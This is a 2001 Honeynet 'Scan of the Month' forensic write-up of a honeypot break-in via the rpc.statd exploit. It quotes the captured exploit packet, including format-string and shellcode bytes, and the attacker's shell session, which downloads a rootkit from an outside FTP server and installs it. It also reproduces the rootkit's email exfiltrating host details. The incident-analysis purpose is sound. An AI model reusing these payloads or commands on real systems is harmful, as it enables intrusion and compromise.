Project Honeynet, Scan of the month - September (SCAN 18) Analysis and Answers Date: 20.09.2001 Author: Arndt Lueckerath ------------------------------------------------------------------------------- Abstract ------------------------------------------------------------------------------- This document gives an analyse of a snort log file which recorded various port scans and a break-in to a linux system which has been compromised by an intruder using the rpc.statd exploit (BUGTRAQ ID 1480). ------------------------------------------------------------------------------- Foreword ------------------------------------------------------------------------------- All local shell commands are prefixed with a "#"-sign. Comments and explanations inside a log file are prefixed with a ">"-sign. Command output is showed as is. I tried my best to reduce the command output to a necessary amount of data that is needed for a general understanding and for proving my conclusions. All timestamps, as not otherwise stated, are taken from the IDS log file. Tools being used while analysing: snort, by Martin Roesch, http://www.snort.org/ tcpflow, by Jeremy Elson http://www.circlemud.org/~jelson/ ------------------------------------------------------------------------------- Getting prepared ------------------------------------------------------------------------------- Fetch the log file from the honeynet web server using wget. # wget http://project.honeynet.org/scans/scan18/snort-0315@0005.log.tar.gz After this verify the md5-checksum against the one provided by honeynet. By doing this, we can see that the checksum matches, so we can continue. # md5sum snort-0315\@0005.log.tar.gz 9b68e8ffade74bbf5ce0296a1977d111 snort-0315@0005.log.tar.gz ------------------------------------------------------------------------------- Summary of the Analyse ------------------------------------------------------------------------------- In order to receive a first impression of the attack as a whole I browsed through the file using snort to find out the important steps of which the blackhats built up their attacks. # snort -Xv -r snort-0315\@0005.log | less While I was browsing I noticed some important phases which should help us later to answer the questions. To draw a clearer picture I can divide those periods in three successive main phases: 1) scan phase purpose: find a vulnerable target system various scans against the network 172.16.1.0/24 2) intrusion phase purpose: break into the system and gain privileged access The exploit which the attacker used was the rpc.statd exploit (bugtraq id 1480 ). See the following URLs for further information: CERT: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666 SECURITYFOCUS: http://www.securityfocus.com/bid/1480 3) safeguard phase purpose: install backdoors, hide and hack The safeguard phase is in fact the period from where we get lots of information about the blackhats itself. After browsing I used tcpflow to extract the single tcp-data streams out of the log file for easy reading (see also answer to bonus question). # tcpflow -r snort-0315\@0005.log ------------------------------------------------------------------------------- In deep analyse ------------------------------------------------------------------------------- 1) scan phase Now lets have a deeper look at the various scans and let us try to find out what we can conclude from the gathered information. The scans came from three different systems. A scan overview: 1st scan at 11:33 from 203.111.78.182 (baccess-01-182.magna.com.au) WHOIS: Davnet Telecommunications, Sydney, Australia (Australian ISP, see http://www.davnet.com.au/) TARGET: 172.16.1.102-108, Port 111 SCAN TYPE: tcp-connect() 2nd scan at 15:35 from 211.180.229.190 WHOIS: Ice Core, Seoul, Korea (customer of Korean ISP BORANET, see http://www.bora.net/eng/) TARGET: 172.16.1.101-108, Port 515 telnet attempt against 172.16.1.103 SCAN TYPE: tcp-connect() 3rd scan at 03:21 from 211.185.125.124 WHOIS: Kyongsan Purim Elementary School, South-Korea, Kyongsan (nearby Taegu) TARGET: 172.16.1.101-108, Port 111 SCAN TYPE: tcp-connect() 1st scan at 11:33 from 203.111.78.182 The 1st scan was launched from the system 203.111.78.182 (DAVNET, Sydney) against all hosts in the IP address range of 172.16.1.102-108. They scanned for port 111 which is sunrpc. What is interesting is that the system 172.16.1.103 replied to the scan, but our blackhat seemed not to be interested in this fact. The scan signature is typical for a simple tcp-connect scan, because the complete 3-way-handshake of a tcp connection-establishment was negotiated. --- snort log ---- 03/15-11:33:23.616029 203.111.78.182:2656 -> 172.16.1.102:111 TCP TTL:45 TOS:0x0 ID:37712 IpLen:20 DgmLen:60 DF ******S* Seq: 0x61E38166 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 1425735 0 NOP WS: 0 . . (complete log see file scan18-var.txt). . --- end snort log ---- 2nd scan at 15:53 from 211.180.229.190 The second scan was initiated from the system 211.180.229.190 (Ice Core, Seoul) against all hosts in the IP address range of 172.16.1.101-108. Now they scanned for port 515 which is printer. Again the box at 172.16.1.103 answered to the scan. The scan type is, as in the 1st scan, simple tcp-connect. --- snort log ---- 03/15-15:35:52.282971 211.180.229.190:1558 -> 172.16.1.101:515 TCP TTL:47 TOS:0x0 ID:16156 IpLen:20 DgmLen:60 DF ******S* Seq: 0xFFACC48F Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2453897 0 NOP WS: 0 . . (complete log see file scan18-var.txt) . --- end snort log ---- The fact that the system 172.16.1.103 answered to the scan was now not to be ignored by our friend. Nearly twenty-five minutes later our curious friend tried a telnet connect to the machine. The machine, running SunOS 5.7, gave a login prompt. This was seemingly enough information for our blackhat, no further action had been taken by our friend. --- snort log ---- 03/15-16:08:31.993785 172.16.1.103:23 -> 211.180.229.190:3329 TCP TTL:254 TOS:0x0 ID:19749 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xB7344323 Ack: 0x7A31B9AF Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 627712437 2649850 0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00 .. .k-...`p@..E. 0x0010: 00 55 4D 25 40 00 FE 06 C8 92 AC 10 01 67 D3 B4 .UM%@........g.. 0x0020: E5 BE 00 17 0D 01 B7 34 43 23 7A 31 B9 AF 80 18 .......4C#z1.... 0x0030: 27 98 02 DE 00 00 01 01 08 0A 25 6A 21 B5 00 28 '.........%j!..( 0x0040: 6E FA FF FE 1F FF FE 23 FF FE 27 FF FE 24 0D 0A n......#..'..$.. 0x0050: 0D 0A 53 75 6E 4F 53 20 35 2E 37 0D 0A 0D 00 0D ..SunOS 5.7..... 0x0060: 0A 0D 00 ... . . (complete log see file scan18-var.txt) . 03/15-16:08:32.289164 172.16.1.103:23 -> 211.180.229.190:3329 TCP TTL:254 TOS:0x0 ID:19750 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0xB7344344 Ack: 0x7A31B9AF Win: 0x2798 TcpLen: 32 TCP Options (3) => NOP NOP TS: 627712467 2649882 0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00 .. .k-...`p@..E. 0x0010: 00 44 4D 26 40 00 FE 06 C8 A2 AC 10 01 67 D3 B4 .DM&@........g.. 0x0020: E5 BE 00 17 0D 01 B7 34 43 44 7A 31 B9 AF 80 18 .......4CDz1.... 0x0030: 27 98 E4 D1 00 00 01 01 08 0A 25 6A 21 D3 00 28 '.........%j!..( 0x0040: 6F 1A FF FB 01 FF FB 03 FF FD 01 6C 6F 67 69 6E o..........login 0x0050: 3A 20 : --- snort log ---- At 17:06 someone (209.123.128.12) checked the nameserver on the machine 172.16.1.103, by sending a query for www.black-hats.com. --- snort log ---- 03/15-17:06:39.418960 209.123.128.12:4876 -> 172.16.1.103:53 UDP TTL:49 TOS:0x0 ID:27923 IpLen:20 DgmLen:64 Len: 44 0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00 ...`p@.. .k-..E. 0x0010: 00 40 6D 13 00 00 31 11 1D 9B D1 7B 80 0C AC 10 .@m...1....{.... 0x0020: 01 67 13 0C 00 35 00 2C 08 39 7E 6D 00 00 00 01 .g...5.,.9~m.... 0x0030: 00 00 00 00 00 00 03 77 77 77 0A 42 4C 41 43 4B .......www.BLACK 0x0040: 2D 48 41 54 53 03 43 4F 4D 00 00 01 00 01 -HATS.COM..... 03/15-17:06:39.425856 172.16.1.103:53 -> 209.123.128.12:4876 UDP TTL:254 TOS:0x0 ID:34927 IpLen:20 DgmLen:112 DF Len: 92 0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00 .. .k-...`p@..E. 0x0010: 00 70 88 6F 40 00 FE 11 F5 0D AC 10 01 67 D1 7B .p.o@........g.{ 0x0020: 80 0C 00 35 13 0C 00 5C 32 EE 7E 6D 80 80 00 01 ...5...\2.~m.... 0x0030: 00 02 00 00 00 00 03 77 77 77 0A 42 4C 41 43 4B .......www.BLACK 0x0040: 2D 48 41 54 53 03 43 4F 4D 00 00 01 00 01 C0 0C -HATS.COM....... 0x0050: 00 05 00 01 00 01 51 80 00 14 03 6C 61 62 0A 62 ......Q....lab.b 0x0060: 6C 61 63 6B 2D 68 61 74 73 03 63 6F 6D 00 C0 30 lack-hats.com..0 0x0070: 00 01 00 01 00 01 51 80 00 04 D8 50 47 6A ......Q....PGj --- end snort log ---- 3rd scan at 03:21 from 211.185.125.124 The scan signature of the 3rd scan is completely different as of the other scans. The scan was targeted against all hosts of the IP address range 172.16.1.101-108. The target port was 111 sunrpc. Interesting is the fact that the scan was executed several times. Also an important fact: If one machine answers to the scan, the rpc.statd exploit is sent directly to the system. We can conclude from these information that this scan was originated by some kind of script which searches for vulnerable targets. --- snort log ---- 03/16-03:21:23.840485 211.185.125.124:3493 -> 172.16.1.101:111 TCP TTL:43 TOS:0x0 ID:28754 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9B8A127C Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 23678607 0 NOP WS: 0 . . > The system at 172.16.1.108 answered, what a fun. 03/16-03:21:23.881889 172.16.1.108:111 -> 211.185.125.124:3500 TCP TTL:63 TOS:0x0 ID:72 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x5820ADCF Ack: 0x9B6338C5 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2878772 23678607 NOP WS: 0 . . > This time the system at 172.16.1.108 answered also on port 111. > Great luck for our blackhat. 03/16-03:21:23.863680 172.16.1.103:111 -> 211.185.125.124:3495 TCP TTL:254 TOS:0x0 ID:24109 IpLen:20 DgmLen:64 DF ***A**S* Seq: 0xE409173D Ack: 0x9B6B33C1 Win: 0x2798 TcpLen: 44 TCP Options (9) => NOP NOP TS: 631749790 23678607 NOP WS: 0 NOP TCP Options => NOP SackOK MSS: 1460 . . --- end snort log ---- 2) intrusion phase Our blackhat found two systems which seemed to have sunrpc running. Our friend will try to exploit first the system at 172.16.1.103 then the system at 172.16.1.108. The latter exploit will actually result in a break-in, by gaining a shell with root access. Now lets look at the first exploit. We can see some shell-code and at the end obviously the command which should get executed after smashing the stack (/bin/sh). --- snort log ---- > Send a request to portmapper 03/16-03:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84 Len: 64 > Portmapper answered, communcation channel is now open > at port 32773 (0x8005) 03/16-03:21:24.455402 172.16.1.103:111 -> 211.185.125.124:789 UDP TTL:254 TOS:0x0 ID:24110 IpLen:20 DgmLen:56 DF Len: 36 . . 0x0040: 00 00 00 00 80 05 ...... > do the exploit 03/16-03:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00 ...`p@.. .k-..E. 0x0010: 04 50 74 55 00 00 2B 11 18 9B D3 B9 7D 7C AC 10 .PtU..+.....}|.. 0x0020: 01 67 03 16 80 05 04 3C C8 3D 47 F7 9F 63 00 00 .g.....<.=G..c.. 0x0030: 00 00 00 00 00 02 00 01 86 B8 00 00 00 01 00 00 ................ 0x0040: 00 01 00 00 00 01 00 00 00 20 3A B1 5E E5 00 00 ......... :.^... 0x0050: 00 09 6C 6F 63 61 6C 68 6F 73 74 00 00 00 00 00 ..localhost..... 0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x0070: 00 00 00 00 03 E7 18 F7 FF BF 18 F7 FF BF 19 F7 ................ 0x0080: FF BF 19 F7 FF BF 1A F7 FF BF 1A F7 FF BF 1B F7 ................ 0x0090: FF BF 1B F7 FF BF 25 38 78 25 38 78 25 38 78 25 ......%8x%8x%8x% 0x00A0: 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 0x00B0: 78 25 32 33 36 78 25 6E 25 31 33 37 78 25 6E 25 x%236x%n%137x%n% 0x00C0: 31 30 78 25 6E 25 31 39 32 78 25 6E 90 90 90 90 10x%n%192x%n.... . . 0x0430: 3F CD 80 C7 06 2F 62 69 6E C7 46 04 2F 73 68 41 ?..../bin.F./shA 0x0440: 30 C0 88 46 07 89 76 0C 8D 56 10 8D 4E 0C 89 F3 0..F..v..V..N... 0x0450: B0 0B CD 80 B0 01 CD 80 E8 7F FF FF FF 00 .............. > 172.16.1.103 answered "normally", nothing happened 03/16-03:21:24.735452 172.16.1.103:32773 -> 211.185.125.124:790 UDP TTL:254 TOS:0x0 ID:24111 IpLen:20 DgmLen:60 DF Len: 40 > Now run the exploit against 172.16.1.108. > Send a request to portmapper 03/16-03:21:24.995382 211.185.125.124:790 -> 172.16.1.108:111 UDP TTL:43 TOS:0x0 ID:29784 IpLen:20 DgmLen:84 Len: 64 > Portmapper answered, communcation channel is now open > at port 931 (0x3a3) 03/16-03:21:25.042649 172.16.1.108:111 -> 211.185.125.124:790 UDP TTL:63 TOS:0x0 ID:73 IpLen:20 DgmLen:56 Len: 36 . . 0x0040: 00 00 00 00 03 A3 ...... > no do the exploit (exploit packet gets sent three times, with > different UDP packet-ids) 03/16-03:21:25.326967 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:29787 IpLen:20 DgmLen:1104 Len: 1084 . . 0x0080: FF BF 19 F7 FF BF 1A F7 FF BF 1A F7 FF BF 1B F7 ................ 0x0090: FF BF 1B F7 FF BF 25 38 78 25 38 78 25 38 78 25 ......%8x%8x%8x% 0x00A0: 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 0x00B0: 78 25 32 33 36 78 25 6E 25 31 33 37 78 25 6E 25 x%236x%n%137x%n% 0x00C0: 31 30 78 25 6E 25 31 39 32 78 25 6E 90 90 90 90 10x%n%192x%n.... 0x00D0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ . . 0x0420: C3 31 C9 B0 3F CD 80 FE C1 B0 3F CD 80 FE C1 B0 .1..?.....?..... 0x0430: 3F CD 80 C7 06 2F 62 69 6E C7 46 04 2F 73 68 41 ?..../bin.F./shA 0x0440: 30 C0 88 46 07 89 76 0C 8D 56 10 8D 4E 0C 89 F3 0..F..v..V..N... 0x0450: B0 0B CD 80 B0 01 CD 80 E8 7F FF FF FF 00 .............. . . 03/16-03:21:27.324233 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:30705 IpLen:20 DgmLen:1104 Len: 1084 . . 03/16-03:21:29.303241 211.185.125.124:791 -> 172.16.1.108:931 UDP TTL:43 TOS:0x0 ID:30708 IpLen:20 DgmLen:1104 Len: 1084 . . > Try to connect to port 39168 (standard port by the exploit), to > see if the shell is running. > 3-way-handshake 03/16-03:21:36.312515 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31657 IpLen:20 DgmLen:60 DF ******S* Seq: 0x9C6D2BFE Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 23679855 0 NOP WS: 0 03/16-03:21:36.313896 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:75 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x59606332 Ack: 0x9C6D2BFF Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 2880015 23679855 NOP TCP Options => WS: 0 03/16-03:21:36.538332 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31659 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 > Success! Now he got a shell on port 39168 running! > cd to /, see what system I am on and look what > effektive uid is my shell running on. 03/16-03:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00 ...`p@.. .k-..E. 0x0010: 00 47 7B AC 40 00 2B 06 D5 52 D3 B9 7D 7C AC 10 .G{.@.+..R..}|.. 0x0020: 01 6C 11 62 99 00 9C 6D 2B FF 59 60 63 33 80 18 .l.b...m+.Y`c3.. 0x0030: 7D 78 7C 54 00 00 01 01 08 0A 01 69 53 86 00 2B }x|T.......iS..+ 0x0040: F2 0F 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 ..cd /; uname -a 0x0050: 3B 20 69 64 3B ; id; --- end snort log ---- 3) safeguard phase After the blackhat gained root access by connecting to the shell on port 39168 he transferred a rootkit to the machine and installed it onto the system. These are the command sequence that were executed in the shell session: --- tcpflow file 211.185.125.124.04450-172.016.001.108.39168 --- cd /; uname -a; id; ftp -v ftp.home.ro soane i2ttgcj1d get lk.tgz bye tar -zxvf lk.tgz cd last ./install --- end tcpflow file --- This is what gets back from the shell. We can see that see install script outputs a message in Rumanian language. Also we see that our blackhat has a member account at home.ro, a Rumanian ISP. Is our friend of Rumanian nationality ? --- tcpflow file 172.016.001.108.39168-211.185.125.124.04450 --- (for complete log see attached file scan18-var.txt) Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown uid=0(root) gid=0(root) Connected to ftp.home.ro. 220- 220- 220- H O M E . R O 220- 220- This server is for HOME.RO members only. 220- Go to http://www.home.ro/ to register. 220- 220- No anonymous access allowed. 220- 220- 220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41] Name (ftp.home.ro:root): 331 Password required for soane. Password:230 User soane logged in. Remote system type is UNIX. Using binary mode to transfer files. local: lk.tgz remote: lk.tgz . . . ********* Instalarea Rootkitului A Pornit La Drum ********* ********* Mircea SUGI PULA ******************************** ********* Multumiri La Toti Care M-Au Ajutat ************** ********* Lemme Give You A Tip : ************************** ********* Ignore everything, call your freedom ************ ********* Scream & swear as much as you can *************** ********* Cuz anyway nobody will hear you and no one will * ********* Care about you ********************************** . . . --- end tcpflow file --- This mail was sent by the rootkit install script. Did our blackhat noticed it ? :) --- 172.016.001.108.01028-216.136.129.014.00025 --- EHLO asdf1 MAIL From: SIZE=836 RCPT To: DATA Received: (from root@localhost) by asdf1 (8.9.3/8.9.3) id TAA00952 for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600 Date: Thu, 15 Mar 2001 19:46:05 -0600 From: root Message-Id: <200103160146.TAA00952@asdf1> To: bidi_damm@yahoo.com Subject: roote * Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown * Hostname : asdf1 * IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0 * Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00 * Cpu Vendor ID : vendor_id : GenuineIntel * Cpu Model : model : 4 model name : Pentium MMX * Cpu Speed: cpu MHz : 200.457171 * Bogomips: bogomips : 399.77 * Spatiu Liber: Filesystem Size Used Avail Use% Mounted on /dev/hda8 251M 33M 205M 14% / /dev/hda1 23M 2.4M 19M 11% /boot /dev/hda6 1.6G 2.1M 1.5G 0% /home /dev/hda5 1.6G 367M 1.2G 23% /usr /dev/hda7 251M 5.3M 232M 2% /var . QUIT --- end tcpflow file --- ------------------------------------------------------------------------------- Answers to the questions ------------------------------------------------------------------------------- 1. What modifications did they make to the break in process to both automate and make the process faster? All blackhats used a port scanner to locate a vulnerable system. The 3rd scan in fact seemed to be executed by a script, something like a combination in the usage of a port scanner and the actual exploit program, because as soon as an open port is detected by the scan process, the exploit is sent to the target system. I want to stress the fact that with such a method one can tasteful automate the break in process, the exploit can be tried out to a large number of systems without loosing much time. 2. What system/country did the badguys come in from? The first scan was initiated from a system (203.111.78.182) in Australia. The IP address belongs to the large address space registered to an Australian ISP named Davnet in Sydney, see (http://www.davnet.com.au/). The second and third systems are both located in Korea. The former system with the IP address 211.180.229.190 belongs to a small address space (16 addresses) registered to an research center named Ice Core in South-Korea, Seoul, district Kangnam-gu, which is a customer of the Korean ISP BORANET (see http://www.bora.net/eng/). We can assume that this system is a machine for doing some research work. The latter system (211.185.125.124) is likely located in Kyongsan, nearby Taegu in South Korea, because the IP address belongs to the address space registered to an elementary school (see http://whois.nic.or.kr/) 3. What nationality are the badguys, and how were you able to determine this? The 1st scan came from an IP address of an Australian ISP, so let us presume that this hacker lives somewhere in Australia and dials into the Internet using the DAVNET ISP service - a simple straightforward theory. Speaking against this theory, this system could be a hacked system of an unsuspecting user connected to DAVNET and whose machine was used by our blackhat as a steppingstone to target at other systems. If we assume so, we have no idea of the hacker's nationality. The 2nd system belongs to the research center Ice Core. My theory in this case is that I feel that this system has been hacked by a blackhat, in order to get a nice platform from where to operate anonymously. Often such systems consist of standard installations and are under nearly no supervision which is therefore an easy target for even inexperienced hackers. So in this case I have really no idea which nationality is our friend. Naturally it could be also the case, that a member of Ice Core, which suffered from boredom, initiated the scan. However, we may never know. Now the theory for the 3rd most interesting scan. As exposed in my analyse, the blackhat installed a rootkit on the affected system. The fact that the rootkit help message are of Rumanian language and the fact that our blackhat owns a member account at the Romania ISP leads to the assumption that our blackhat is apparently able to understand this language. So we have good reason that our blackhat is of Rumania nationality. However, on the other hand, it could be the case that we are dealing with an extraordinary smart person. Supposing so, this would mean that the usage of a Rumanian ISP account and the mentioned rootkit with the Rumanian message is just another tactic to hide the true identity. If we assume, that this is case, nobody knows which is the true nationality. 4. What do the answers to questions #1 and #2 tell us about the tactics the badguys are using? We can conclude that the badguys use hacked systems from where they actually operate almost anonymously - a common tactic being used by hackers - even if not the golden rule number one in a hacker's bible. With this tactic the badguys are able to hide their true identity and locality very effectively. In our case we can likely suppose that our attacker is Rumania nationality, as showed above in question 3, also that maybe he lives there. What we can also conclude by the occurrence of the various scans that scanning is a common method being used by the blackhat community in order to look for hosts running vulnerable services. Automating and scripting attacks is also a technique which the badguys use, as we can see in this case. 5. What did you learn from this challenge? The fact that a system from an elementary school and a system from a research center was used for launching an attack from leads to the direct assumption that those systems, which belong to public or academic institutions, are not being maintained well. Even worse, it is often the case that those institutions have small financial budgets and therefore cannot afford competent personal which maintain the computer systems. I remember a friend who studied computer science at the university. As a student of the university you get an account on a Unix system. Two years after he finished studying he tried to log on to the system, using the account which he used in his study time - the account was still active. If we think of this case and think over that weak passwords are used all over the world, despite of all security recommendations and warnings, we might not wonder, why such systems are hackers paradise: It is really not difficult for a blackhat to crack a username and password by starting a dictionary attack (guessing usernames and passwords with the help of a computer) to such systems. Certainly improving my English (sorry for the german style) and Romania skills. 6. How long did this challenge take you? Get an overview: 10 minutes Research: 1-2 hours Write up: 8 hours Bonus Question: Can you recover the blackhat's rootkit from the Snort binary log file? If so, how? In order to reassembles tcp-streams we only need to find the first data packet in a specific tcp-stream after the 3-way-handshake. Starting with the first sequence number upwards we have to traverse the list of sequence numbers until the stream ends. The data of each packet needs to be written to a file. The tool tcpflow by Jeremy Elson (http://www.circlemud.org/~jelson) does exactly this what we need. By looking at the sequence numbers the program writes the contents of the packets in the correct order to a file. The program can read log files in pcap-format. If we run the program against the snort log file we get a file named 193.231.236.041.00020-172.016.001.108.01027. This is the stream of the FTP-DATA session, the session where the rootkit was being transferred to the linux box. If we rename the file to lk.tgz or we can extract the contents of the archive: (before I forget to mention: do not run ./install, otherwise if you do so some lucky blackhat gets a nice mail from your system :)) # tar zxpvf lk.tgz last/ last/ssh last/pidfile last/install last/linsniffer last/cleaner last/inetd.conf last/lsattr last/services last/sense last/ssh_config last/ssh_host_key last/ssh_host_key.pub last/ssh_random_seed last/sshd_config last/sl2 last/last.cgi last/ps last/netstat last/ifconfig last/top last/logclear last/s last/mkxfs